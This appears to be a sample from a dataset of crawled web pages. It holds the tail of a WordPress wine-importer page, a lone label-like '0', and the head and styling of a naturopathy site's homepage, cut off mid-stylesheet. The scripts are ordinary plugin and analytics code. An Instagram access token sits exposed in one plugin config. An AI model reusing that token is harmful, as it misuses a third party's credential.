src='http://domaineselect.com/wp-includes/js/jquery/ui/button.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://domaineselect.com/wp-includes/js/jquery/ui/position.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://domaineselect.com/wp-includes/js/jquery/ui/dialog.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://domaineselect.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20'></script> <script type='text/javascript'> /* <![CDATA[ */ var _wpcf7 = {"loaderUrl":"http:\/\/domaineselect.com\/wp-content\/plugins\/contact-form-7\/images\/ajax-loader.gif","sending":"Sending ..."}; /* ]]> */ </script> <script type='text/javascript' src='http://domaineselect.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var sb_instagram_js_options = {"sb_instagram_at":"298674147.M2E4MWE5Zg==.NGM4MzYyNzhlNjJkN.GNiZmExNjg2ZjdlMzVl"}; /* ]]> */ </script> <script type='text/javascript' src='http://domaineselect.com/wp-content/plugins/instagram-feed/js/sb-instagram.min.js?ver=1.4.8'></script> <script type='text/javascript' src='http://domaineselect.com/wp-content/plugins/responsive-slideshow/assets/js/jquery.cycle.all.js?ver=4.2.2'></script> <script type='text/javascript' src='http://domaineselect.com/wp-content/plugins/responsive-slideshow/assets/js/jquery.easing.min.js?ver=4.2.2'></script> <script type='text/javascript' src='http://domaineselect.com/wp-content/plugins/responsive-slideshow/assets/js/jquery.touchwipe.min.js?ver=4.2.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var rsArgs = {"fx":"scrollLeft","timeout":"4500","easing":"easeInOutSine","speed":"2200"}; /* ]]> */ </script> <script type='text/javascript' src='http://domaineselect.com/wp-content/plugins/responsive-slideshow/assets/js/script.js?ver=4.2.2'></script> <script type='text/javascript' src='http://domaineselect.com/wp-content/plugins/simple-share-buttons-adder/js/ssba.min.js?ver=4.2.2'></script> <script type='text/javascript' src='http://domaineselect.com/wp-content/themes/domaineselect/js/skip-link-focus-fix.js?ver=20141010'></script> <script type='text/javascript' src='http://domaineselect.com/wp-includes/js/masonry.min.js?ver=3.1.2'></script> <script type='text/javascript' src='http://domaineselect.com/wp-includes/js/comment-reply.min.js?ver=4.2.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var screenReaderText = {"expand":"<span class=\"screen-reader-text\">expand child menu<\/span>","collapse":"<span class=\"screen-reader-text\">collapse child menu<\/span>"}; /* ]]> */ </script> <script type='text/javascript' src='http://domaineselect.com/wp-content/themes/domaineselect/js/functions.js?ver=20150330'></script> <script type='text/javascript'> /* <![CDATA[ */ var mc4wp_forms_config = []; /* ]]> */ </script> <script type='text/javascript' src='http://domaineselect.com/wp-content/plugins/mailchimp-for-wp/assets/js/forms-api.min.js?ver=3.1.11'></script> <!--[if lte IE 9]> <script type='text/javascript' src='http://domaineselect.com/wp-content/plugins/mailchimp-for-wp/assets/js/third-party/placeholders.min.js?ver=3.1.11'></script> <![endif]--> <script type='text/javascript' src='http://domaineselect.com/wp-content/plugins/ditty-news-ticker/assets/js/imagesloaded.pkgd.min.js?ver=2.0.17'></script> <script type='text/javascript' src='http://domaineselect.com/wp-content/plugins/ditty-news-ticker/assets/js/jquery.touchSwipe.min.js?ver=2.0.17'></script> <script type='text/javascript' src='http://domaineselect.com/wp-content/plugins/ditty-news-ticker/assets/js/jquery.easing.1.3.js?ver=2.0.17'></script> <script type='text/javascript' src='http://domaineselect.com/wp-content/plugins/ditty-news-ticker/assets/js/ditty-news-ticker.js?ver=2.0.17'></script> <script> jQuery( document ).ready( function($) { $( '#mtphr-dnt-241' ).ditty_news_ticker({ id : '241', type : 'scroll', scroll_direction : 'left', scroll_speed : 5, scroll_pause : 0, scroll_spacing : 40, scroll_init : 0, rotate_type : 'fade', auto_rotate : 1, rotate_delay : 7, rotate_pause : 0, rotate_speed : 3, rotate_ease : 'linear', nav_reverse : 0, disable_touchswipe : 0, offset : 20, after_load : function( $ticker ) { }, before_change : function( $ticker ) { }, after_change : function( $ticker ) { } }); }); </script> <script type="text/javascript">(function() {function addEventListener(element,event,handler) { if(element.addEventListener) { element.addEventListener(event,handler, false); } else if(element.attachEvent){ element.attachEvent('on'+event,handler); } }})();</script><!-- We need this for debugging themes using Speed Booster Pack Plugin v2.8 --> <!-- <div id="popup-box-adult_bg" class="active"></div> <div class="popup-box active" id="popup-box-adult"> <div class="popup-logo"></div> <p style="color:black;"> DOMAINESELECT.COM IS INTENDED FOR AUDIENCES OF LEGAL DRINKING AGE.<br /><br /> BY ENTERING THIS SITE YOU CONFIRM THAT YOU ARE OF LEGAL AGE TO PURCHASE AND CONSUME ALCOHOLIC BEVERAGES IN YOUR LOCALITY.<br /><br /> ENJOY RESPONSIBLY. </p> <button class="btn">I am of legal age for my county</button> </div> --> </body> </html> <!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/ Page Caching using disk: enhanced Database Caching using disk Object Caching 0/0 objects using disk Application Monitoring using New Relic Served from: domaineselect.com @ 2019-05-16 15:37:04 by W3 Total Cache -->
0
<!DOCTYPE html> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <head> <title>Discover How To Optimize Your Health | Planet Naturopath</title> <!--[if lt IE 9]> <script src="https://www.planetnaturopath.com/wp-content/themes/rise/js/html5/dist/html5shiv.js"></script> <script src="//css3-mediaqueries-js.googlecode.com/svn/trunk/css3-mediaqueries.js"></script> <![endif]--> <!--[if IE 8]> <link rel="stylesheet" type="text/css" href="https://www.planetnaturopath.com/wp-content/themes/rise/css/ie8.css"/> <![endif]--> <!--[if IE 7]> <link rel="stylesheet" type="text/css" href="https://www.planetnaturopath.com/wp-content/themes/rise/css/ie7.css"/> <![endif]--> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <meta charset="UTF-8"> <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png"> <link rel="icon" type="image/png" href="/favicon-32x32.png" sizes="32x32"> <link rel="icon" type="image/png" href="/favicon-16x16.png" sizes="16x16"> <link rel="manifest" href="/manifest.json"> <link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5"> <meta name="theme-color" content="#ffffff"> <title>Discover How To Optimize Your Health | Planet Naturopath</title> <style type="text/css">.tve_more_tag {visibility: hidden; height: 1px!important;}</style> <!-- Google Tag Manager for WordPress by gtm4wp.com --> <script data-cfasync="false" type="text/javascript">//<![CDATA[ var gtm4wp_datalayer_name = "dataLayer"; var dataLayer = dataLayer || []; //]]> </script> <!-- End Google Tag Manager for WordPress by gtm4wp.com --> <!-- This site is optimized with the Yoast SEO Premium plugin v9.3 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Are you among those who have been struggling with health problems and not getting results with doctors? Do you know by optimizing your digestion and hormones, you can discover several health issues? Get to know how you can optimize your health, at Planet Naturopath."/> <link rel="canonical" href="https://www.planetnaturopath.com/" /> <link rel="publisher" href="https://plus.google.com/u/1/+MichaelSmithPlanetNaturopath"/> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Discover How To Optimize Your Health | Planet Naturopath" /> <meta property="og:description" content="Are you among those who have been struggling with health problems and not getting results with doctors? Do you know by optimizing your digestion and hormones, you can discover several health issues? Get to know how you can optimize your health, at Planet Naturopath." /> <meta property="og:url" content="https://www.planetnaturopath.com/" /> <meta property="og:site_name" content="Planet Naturopath" /> <meta property="og:image" content="https://www.planetnaturopath.com/wp-content/uploads/2016/04/New-logo.png" /> <meta property="og:image:secure_url" content="https://www.planetnaturopath.com/wp-content/uploads/2016/04/New-logo.png" /> <meta property="og:image:width" content="898" /> <meta property="og:image:height" content="349" /> <meta property="og:image:alt" content="Planet Naturopath Functional medicine and nutrition" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:description" content="Are you among those who have been struggling with health problems and not getting results with doctors? Do you know by optimizing your digestion and hormones, you can discover several health issues? Get to know how you can optimize your health, at Planet Naturopath." /> <meta name="twitter:title" content="Discover How To Optimize Your Health | Planet Naturopath" /> <meta name="twitter:site" content="@planetnaturopat" /> <meta name="twitter:image" content="//www.planetnaturopath.com/wp-content/uploads/2018/10/michael-smithv3.png" /> <meta name="twitter:creator" content="@planetnaturopat" /> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"WebSite","@id":"https://www.planetnaturopath.com/#website","url":"https://www.planetnaturopath.com/","name":"Planet Naturopath","potentialAction":{"@type":"SearchAction","target":"https://www.planetnaturopath.com/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"Organization","url":"https://www.planetnaturopath.com/","sameAs":["https://www.facebook.com/Planet-Naturopath-316734994565/","https://www.linkedin.com/in/planetnaturopath?trk=hp-identity-name","https://plus.google.com/u/1/+MichaelSmithPlanetNaturopath","https://www.youtube.com/channel/UCU6VtzexP7VMgiDHWPoofOg","https://twitter.com/planetnaturopat"],"@id":"https://www.planetnaturopath.com/#organization","name":"Planet Naturopath","logo":"https://www.planetnaturopath.com/wp-content/uploads/2016/07/planetnaturopath-logo.png"}</script> <meta name="msvalidate.01" content="25F25E4AF8381B9D19D4B67C50344ECD" /> <meta name="google-site-verification" content="yTUJcjB9s709brLitWwiOFUeMhkzBIE1gcs300-cBIk" /> <meta name="p:domain_verify" content="7bbbb3012fe916e07e214308abe0b0b2" /> <!-- / Yoast SEO Premium plugin. --> <link rel='dns-prefetch' href='//s.w.org' /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.planetnaturopath.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://www.planetnaturopath.com/wp-includes/css/dist/block-library/style.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='wp-components-css' href='https://www.planetnaturopath.com/wp-includes/css/dist/components/style.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='wp-editor-font-css' href='https://fonts.googleapis.com/css?family=Noto+Serif%3A400%2C400i%2C700%2C700i&#038;ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='wp-block-editor-css' href='https://www.planetnaturopath.com/wp-includes/css/dist/block-editor/style.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='wp-nux-css' href='https://www.planetnaturopath.com/wp-includes/css/dist/nux/style.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='wp-editor-css' href='https://www.planetnaturopath.com/wp-includes/css/dist/editor/style.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='amalinkspro-cgb-style-css-css' href='https://www.planetnaturopath.com/wp-content/plugins/amalinkspro/includes/amalinkspro/dist/blocks.style.build.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='amalinkspro-css' href='https://www.planetnaturopath.com/wp-content/plugins/amalinkspro/public/css/amalinkspro-public.css?ver=1.3.3' type='text/css' media='all' /> <link rel='stylesheet' id='wp-video-popup-css' href='https://www.planetnaturopath.com/wp-content/plugins/responsive-youtube-vimeo-popup/assets/css/wp-video-popup.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='bodhi-svgs-attachment-css' href='https://www.planetnaturopath.com/wp-content/plugins/svg-support/css/svgs-attachment.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='toc-screen-css' href='https://www.planetnaturopath.com/wp-content/plugins/table-of-contents-plus/screen.min.css?ver=1509' type='text/css' media='all' /> <link rel='stylesheet' id='tve_style_family_tve_flt-css' href='https://www.planetnaturopath.com/wp-content/plugins/thrive-visual-editor/editor/css/thrive_flat.css?ver=2.2.0.1' type='text/css' media='all' /> <link rel='stylesheet' id='parent-style-css' href='https://www.planetnaturopath.com/wp-content/themes/rise/style.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='child-style-css' href='https://www.planetnaturopath.com/wp-content/themes/rise-child/style.css?ver=1.0.0' type='text/css' media='all' /> <link rel='stylesheet' id='rise-style-css' href='https://www.planetnaturopath.com/wp-content/themes/rise-child/style.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='thrive-reset-css' href='https://www.planetnaturopath.com/wp-content/themes/rise/css/reset.css?v=1.0.0' type='text/css' media='all' /> <link rel='stylesheet' id='thrive-main-style-css' href='https://www.planetnaturopath.com/wp-content/themes/rise/css/main_green.css?v=1.0.0' type='text/css' media='all' /> <link rel='stylesheet' id='jquery-lazyloadxt-fadein-css-css' href='//www.planetnaturopath.com/wp-content/plugins/a3-lazy-load/assets/css/jquery.lazyloadxt.fadein.css?v=1.0.0' type='text/css' media='all' /> <link rel='stylesheet' id='a3a3_lazy_load-css' href='//www.planetnaturopath.com/wp-content/uploads/sass/a3_lazy_load.min.css?ver=1541262169' type='text/css' media='all' /> <link rel='stylesheet' id='tva-checkout-css-css' href='https://www.planetnaturopath.com/wp-content/plugins/thrive-apprentice/css/checkout.css?ver=2.1.7.1' type='text/css' media='all' /> <script type='text/javascript' src='https://www.planetnaturopath.com/wp-includes/js/jquery/jquery.js?v=1.0.0'></script> <script type='text/javascript' src='https://www.planetnaturopath.com/wp-includes/js/jquery/jquery-migrate.min.js?v=1.0.0'></script> <script type='text/javascript'> /* <![CDATA[ */ var objectL10n = {"reviews":"View Ratings and Reviews"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.planetnaturopath.com/wp-content/plugins/amalinkspro/public/js/amalinkspro-public.js?ver=1.3.3'></script> <script type='text/javascript' src='https://www.planetnaturopath.com/wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-form-move-tracker.js?ver=1.9.2'></script> <link rel='https://api.w.org/' href='https://www.planetnaturopath.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.planetnaturopath.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.planetnaturopath.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.2" /> <link rel='shortlink' href='https://www.planetnaturopath.com/' /> <link rel="alternate" type="application/json+oembed" href="https://www.planetnaturopath.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.planetnaturopath.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://www.planetnaturopath.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.planetnaturopath.com%2F&#038;format=xml" /> <script type="text/javascript"> var ajaxurl = "https://www.planetnaturopath.com/wp-admin/admin-ajax.php"; </script><script>var amalinkspro_plugin_url = "https://www.planetnaturopath.com/wp-content/plugins";</script> <script>var cb_wp=cb_wp || {};cb_wp.post_data={"id":4607,"tags":[],"post_type":"page","cats":[]}</script ><style type="text/css" id="tve_global_variables">:root{}</style> <!-- Google Tag Manager for WordPress by gtm4wp.com --> <script data-cfasync="false" type="text/javascript">//<![CDATA[ var google_tag_params = {"pageTitle":"Discover How To Optimize Your Health | Planet Naturopath","pagePostType":"frontpage","pagePostType2":"single-page","pagePostAuthor":"Michael"}; dataLayer.push({"visitorLoginState":"logged-out","visitorType":"visitor-logged-out","pageTitle":"Discover How To Optimize Your Health | Planet Naturopath","pagePostType":"frontpage","pagePostType2":"single-page","pagePostAuthor":"Michael","google_tag_params":window.google_tag_params});//]]> </script> <script data-cfasync="false">//<![CDATA[ (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= '//www.googletagmanager.com/gtm.'+'js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-K5JWCVN');//]]> </script> <!-- End Google Tag Manager --> <!-- End Google Tag Manager for WordPress by gtm4wp.com --><link href='//fonts.googleapis.com/css?family=Roboto+Slab:400,700' rel='stylesheet' type='text/css'> <style type="text/css">.wp-video-shortcode { max-width: 100% !important; } .bSe a { clear: right; } .bSe blockquote { clear: both; } body { background:#FFF; }.cnt article h1.entry-title a { color:#3fb546; }.cnt article h2.entry-title a { color:#3fb546; }.bSe h1, h1.entry-title, h1.entry-title a { color:#3fb546; }.bSe h2 { color:#3fb546; }.bSe h3 { color:#3fb546; }.bSe h4 { color:#3fb546; }.bSe h5 { color:#3fb546; }.bSe h6 { color:#3fb546; }.bSe p, .mry .awr-e p { color:#666; }.cnt .bSe { color:#666; }.cnt h1 a, .tve-woocommerce .bSe .awr .entry-title, .tve-woocommerce .bSe .awr .page-title{font-family:Roboto Slab,sans-serif;}.bSe h1{font-family:Roboto Slab,sans-serif;}.bSe h2,.tve-woocommerce .bSe h2{font-family:Roboto Slab,sans-serif;}.bSe h3,.tve-woocommerce .bSe h3{font-family:Roboto Slab,sans-serif;}.bSe h4{font-family:Roboto Slab,sans-serif;}.bSe h5{font-family:Roboto Slab,sans-serif;}.bSe h6{font-family:Roboto Slab,sans-serif;}#text_logo{font-family:Roboto Slab,sans-serif;}.cnt h1 a { font-weight:500; }.bSe h1 { font-weight:500; }.bSe h2 { font-weight:500; }.bSe h3 { font-weight:500; }.bSe h4 { font-weight:500; }.bSe h5 { font-weight:500; }.bSe h6 { font-weight:500; }.cnt{font-family:Roboto,sans-serif;font-weight:300;}article strong {font-weight: bold;}.cnt p, .tve-woocommerce .product p, .tve-woocommerce .products p, .brd ul li, header nav ul li a, header nav ul li > ul li a, .has-extended.has-heading .colch, footer, footer .fmm p, .aut-f{font-family:Roboto,sans-serif;font-weight:300;}article strong {font-weight: bold;}.bSe h1, .bSe .entry-title { font-size:28px; }.cnt { font-size:17px; }.thrivecb { font-size:17px; }.out { font-size:17px; }.aut p { font-size:17px; }.cnt p { line-height:1.5em; }.thrivecb { line-height:1.5em; }.bSe a, .cnt a { color:#47b84e; }.bSe .faq h4{font-family:Roboto,sans-serif;font-weight:300;}article strong {font-weight: bold;}header nav > ul.menu > li > a { color:#fff; }header nav > ul.menu > li > a:hover { color:#fff; }header nav > ul > li.current_page_item > a:hover { color:#fff; }header nav > ul > li.current_menu_item > a:hover { color:#fff; }header nav > ul > li.current_menu_item > a:hover { color:#fff; }header nav > ul > li > a:active { color:#fff; }header #logo > a > img { max-width:200px; }header ul.menu > li.h-cta > a { color:#FFFFFF!important; }header ul.menu > li.h-cta > a { background:#bbd4c1; }header ul.menu > li.h-cta > a { border-color:#bbd4c1; }header ul.menu > li.h-cta > a:hover { color:#bbd4c1!important; }header ul.menu > li.h-cta > a:hover { background:#transparent; }</style> <script type="text/javascript">var essb_settings = {"ajax_url":"https:\/\/www.planetnaturopath.com\/wp-admin\/admin-ajax.php","essb3_nonce":"11b89e0160","essb3_plugin_url":"https:\/\/www.planetnaturopath.com\/wp-content\/plugins\/easy-social-share-buttons3","essb3_stats":true,"essb3_ga":true,"essb3_ga_mode":"extended","blog_url":"https:\/\/www.planetnaturopath.com\/","essb3_postfloat_stay":false,"post_id":4607,"postfloat_top":"190","postfloat_percent":"5"};var essb_buttons_exist = !!document.getElementsByClassName("essb_links"); if(essb_buttons_exist == true) { document.addEventListener("DOMContentLoaded", function(event) { var ESSB_CACHE_URL = "https://www.planetnaturopath.com/"; if(ESSB_CACHE_URL.indexOf("?") > -1) { ESSB_CACHE_URL += "&essb_counter_cache=rebuild"; } else { ESSB_CACHE_URL += "?essb_counter_cache=rebuild"; }; var xhr = new XMLHttpRequest(); xhr.open("GET",ESSB_CACHE_URL,true); xhr.send(); });}</script><script type="text/javascript" src="//script.crazyegg.com/pages/scripts/0078/6023.js" async="async"></script><meta name="p:domain_verify" content="7bbbb3012fe916e07e214308abe0b0b2"/><link rel="icon" href="https://www.planetnaturopath.com/wp-content/uploads/2019/01/cropped-Favicon-32x32.png" sizes="32x32" /> <link rel="icon" href="https://www.planetnaturopath.com/wp-content/uploads/2019/01/cropped-Favicon-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://www.planetnaturopath.com/wp-content/uploads/2019/01/cropped-Favicon-180x180.png" /> <meta name="msapplication-TileImage" content="https://www.planetnaturopath.com/wp-content/uploads/2019/01/cropped-Favicon-270x270.png" /> <style type="text/css" class="tve_global_style"></style> <style type="text/css" class="tve_custom_style">@import url("//fonts.googleapis.com/css?family=Roboto+Slab:700,300,400,&subset=latin");@import url("//fonts.googleapis.com/css?family=Roboto:400,700,300,900,&subset=latin");@media (min-width: 300px){[data-css="tve-u-1655d2d2ff1"] { width: 960px; float: none; margin-left: auto !important; margin-right: auto !important; margin-top: 20px !important; }[data-css="tve-u-166c3d9f733"] { border: 0px none rgb(102, 102, 102); border-radius: 0px; box-shadow: none; background-color: rgba(63, 181, 70, 0.61) !important; background-image: none !important; }[data-css="tve-u-166c3d9f736"] { padding-right: 0px; padding-bottom: 0px; padding-left: 0px; color: rgb(51, 51, 51); min-height: 0px; margin-left: 0px; margin-right: 0px; padding-top: 34px !important; margin-top: -50px !important; }[data-css="tve-u-166c3d9f75c"] { max-width: 1190px; }#tve_editor [data-css="tve-u-166c3deab2f"] { color: rgb(255, 255, 255) !important; }[data-css="tve-u-166c3deab2f"] { line-height: 1.15em !important; }[data-css="tve-u-166c3df43e6"] { font-size: 18px !important; font-family: Roboto !important; color: rgb(255, 255, 255) !important; }[data-css="tve-u-166c3df82d1"] { font-family: Roboto !important; }[data-css="tve-u-166c3e0f690"] { border: none; margin: 143px 0px -16px !important; padding-top: 0px !important; padding-right: 0px !important; padding-bottom: 0px !important; }#tve_editor [data-css="tve-u-166c3ea69e3"]:hover .tcb-button-link { text-decoration: none !important; background-image: none !important; background-color: rgb(82, 204, 90) !important; border-color: rgb(255, 255, 255) !important; }[data-css="tve-u-166c3ea69e3"] { display: block; max-width: 279px; float: left; z-index: 3; position: relative; width: 279px; margin: -10px auto 9px !important; }[data-css="tve-u-166c3ea69e3"] .tcb-button-link { border-radius: 8px; overflow: hidden; border-image: initial; border-color: rgb(255, 255, 254); box-shadow: rgba(0, 0, 0, 0.08) 0px 8px 12px 0px; padding-top: 16px !important; padding-bottom: 16px !important; background-color: rgb(63, 181, 70) !important; background-image: none !important; }#tve_editor [data-css="tve-u-166c3ea69e3"] .tcb-button-link { font-size: 25px; line-height: 36px; }[data-css="tve-u-166c3ea69e4"]::after { clear: both; }#tve_editor [data-css="tve-u-166c3ea69eb"] { font-family: Roboto !important; font-weight: 400 !important; color: rgb(255, 255, 255) !important; font-size: 19px !important; }#tve_editor [data-css="tve-u-166c3ea69e3"] .tcb-button-link span { color: rgb(255, 255, 255); }[data-css="tve-u-166c3f1dced"] { width: 650px; margin-bottom: 1px !important; padding-bottom: 0px !important; padding-top: 44px !important; }[data-css="tve-u-166c3f2de8e"] { height: calc(100% - -10px); padding-bottom: 0px !important; margin-bottom: -10px !important; }[data-css="tve-u-166c3f5a587"] { margin-bottom: 15px !important; }[data-css="tve-u-166c3f5ac5d"] { padding-bottom: 0px !important; }[data-css="tve-u-166c3f5d938"] { height: calc(100% - 14px); margin-bottom: 0px !important; padding-bottom: 0px !important; }[data-css="tve-u-166c3f74e0e"] { float: none; margin-right: auto; margin-left: auto; width: 1600px; margin-top: 20px !important; margin-bottom: 20px !important; }[data-css="tve-u-166c3f74e0f"] { box-shadow: rgba(0, 0, 0, 0.08) 0px 13px 46px -3px; background-color: rgb(255, 255, 255) !important; background-image: linear-gradient(rgba(255, 255, 255, 0.1), rgba(255, 255, 255, 0.1)) !important; background-size: auto !important; background-position: 0px 0px !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }[data-css="tve-u-166c3f74e10"] { border-top: none; border-bottom: none; padding-left: 20px !important; padding-right: 20px !important; margin-top: -3px !important; }[data-css="tve-u-166c3f74e11"] { max-width: 1180px; }[data-css="tve-u-166c3f82fa5"] { width: 650px; border: none; border-radius: 0px; overflow: hidden; padding-bottom: 10px !important; }[data-css="tve-u-166c3f82fa5"] img { opacity: 1; filter: grayscale(0%) blur(0px); }[data-css="tve-u-166c3f94e83"] { border: 0px none rgb(102, 102, 102); border-radius: 0px; background-image: none; background-repeat: repeat; background-size: auto; background-attachment: scroll; background-position: 0% 0%; box-shadow: none; background-color: rgb(255, 255, 255) !important; }[data-css="tve-u-166c3f94f65"] { padding-right: 0px; padding-left: 0px; color: rgb(51, 51, 51); min-height: 0px; margin-left: 0px; margin-right: 0px; padding-top: 65px !important; padding-bottom: 80px !important; margin-top: -40px !important; margin-bottom: 0px !important; }[data-css="tve-u-166c3f94f95"] { max-width: 1190px; }#tve_editor [data-css="tve-u-166c3fa5580"] { color: rgb(102, 102, 102) !important; font-size: 29px !important; }[data-css="tve-u-166c3fb20f7"] { margin-top: 16px !important; margin-bottom: 7px !important; padding-bottom: 3px !important; padding-left: 19px !important; }[data-css="tve-u-166c3fb8564"] { color: rgb(63, 181, 70) !important; }#tve_editor [data-css="tve-u-166c3fbf397"]:hover .tcb-button-link { text-decoration: none !important; background-image: none !important; background-color: rgb(63, 181, 70) !important; border-color: rgb(232, 221, 221) !important; box-shadow: rgba(100, 95, 95, 0.08) 0px 8px 12px 0px !important; }[data-css="tve-u-166c3fbf397"] { display: block; max-width: 186px; float: left; z-index: 3; position: relative; width: 186px; margin: -1px auto 9px 37px !important; }[data-css="tve-u-166c3fbf397"] .tcb-button-link { border-radius: 8px; overflow: hidden; border-image: initial; border-color: rgb(132, 132, 131); box-shadow: rgba(0, 0, 0, 0.08) 0px 8px 12px 0px; padding-top: 12px; padding-bottom: 12px; padding-right: 15px; background-color: rgb(20, 58, 35) !important; background-image: none !important; padding-left: 15px !important; }#tve_editor [data-css="tve-u-166c3fbf397"] .tcb-button-link { font-size: 18px; line-height: 1.2em; }#tve_editor [data-css="tve-u-166c3fbf397"] .tcb-button-link span { color: rgb(255, 255, 255); }[data-css="tve-u-166c3fdc50c"] { margin-top: 31px !important; }[data-css="tve-u-166c3fde82b"]::after { clear: both; }[data-css="tve-u-166c3ff0d56"] { width: 636px; float: left; z-index: 3; position: relative; margin-left: 19px !important; margin-right: auto !important; margin-top: 20px !important; padding-right: 0px !important; }[data-css="tve-u-166c4035159"] { line-height: 35px !important; }#tve_editor [data-css="tve-u-166c4035159"] { color: rgb(102, 102, 102) !important; font-size: 23px !important; font-family: Roboto !important; }[data-css="tve-u-166c403515b"] { line-height: 50px !important; }[data-css="tve-u-166c403515c"] { max-width: 1180px; }[data-css="tve-u-166c403515d"] { margin-top: 21px !important; margin-bottom: 0px !important; padding-bottom: 0px !important; }#tve_editor [data-css="tve-u-166c403515b"] { color: rgb(63, 181, 70) !important; font-size: 29px !important; font-family: "Roboto Slab" !important; }[data-css="tve-u-166c403515e"] { border-top: none; border-bottom: none; padding-top: 49px !important; padding-bottom: 56px !important; margin-top: 0px !important; }[data-css="tve-u-166c403515f"] { background-image: linear-gradient(rgba(251, 255, 253, 0.62), rgba(251, 255, 253, 0.62)), url("https://www.planetnaturopath.com/wp-content/uploads/2018/10/medical-tests.jpg") !important; background-size: auto, cover !important; background-position: 50% 50%, 0px 0px !important; background-attachment: scroll, fixed !important; background-repeat: no-repeat, no-repeat !important; }#tve_editor [data-css="tve-u-166c4035160"]:hover .tcb-button-link { text-decoration: none !important; background-image: none !important; background-color: rgb(82, 204, 90) !important; border-color: rgb(255, 255, 255) !important; }[data-css="tve-u-166c4035160"] { display: block; max-width: 345px; width: 345px; margin: 71px auto 5px !important; }[data-css="tve-u-166c4035160"] 